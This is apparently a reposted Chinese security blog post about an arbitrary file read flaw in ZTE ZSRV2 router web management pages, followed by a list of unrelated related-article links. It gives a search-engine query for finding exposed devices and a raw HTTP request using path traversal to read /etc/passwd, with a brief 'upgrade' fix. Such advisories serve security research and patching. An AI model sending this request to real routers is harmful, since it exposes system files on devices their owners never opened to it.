当前位置: 首页 > article >正文

中兴-ZSRV2路由器-任意文件读取

中兴-ZSRV2路由器-任意文件读取

文章目录

  • 中兴-ZSRV2路由器-任意文件读取
    • 免责声明
    • 漏洞描述
    • 搜索语法
    • 漏洞复现
    • 修复建议

免责声明

文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任

漏洞描述

该路由器管理页面的存在任意文件读取漏洞

搜索语法

title=“ZSRV2路由器Web管理系统”

漏洞复现

GET /../../../../../../../../etc/passwd HTTP/1.1
Host: 
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

在这里插入图片描述

修复建议

升级到最新版本


http://www.kler.cn/a/288390.html

相关文章:

  • 【教程】Ubuntu设置alacritty为默认终端
  • CSP/信奥赛C++语法基础刷题训练(8):洛谷P5718:找最小值
  • [JAVAEE] 面试题(四) - 多线程下使用ArrayList涉及到的线程安全问题及解决
  • Servlet入门 Servlet生命周期 Servlet体系结构
  • Llama微调测试记录
  • LeetCode 86.分隔链表
  • arcgisjs4.0 内网部署字体不显示问题处理
  • 【技术详解】Java泛型:全面解析与实战应用(进阶版)
  • sqli-labs靶场通关攻略(六十一关到六十五关)
  • ARM/Linux嵌入式面经(三十):腾讯 C++开发工程师
  • 【Linux学习】Linux开发工具——vim
  • html+css+js网页设计 博物馆 亚历山大美术馆6个页面
  • Flask中的g的作用
  • Linux学习笔记(4)----Debian压力测试方法
  • 日本IT编程语言对比分析-Python /Ruby /C++ /Java
  • 【加密社】马后炮视角来看以太坊二层战略
  • LLM大模型:不要怪大模型回答质量不行了,那是你不会问~
  • 计算机视觉之 SE 注意力模块
  • 微信小程序接入客服功能
  • 逆向工程核心原理 Chapter23 | DLL注入
  • 【舍入,取整,取小数,取余数丨Excel 函数】
  • 探索四川财谷通信息技术有限公司抖音小店的独特魅力
  • 收银系统源码-收银台UI自定义
  • 51单片机-第九节-AT24C02存储器(I2C总线)
  • 代码随想录算法训练营第35天 | 416.分割等和子集
  • PLUTO: 推动基于模仿学习的自动驾驶规划的极限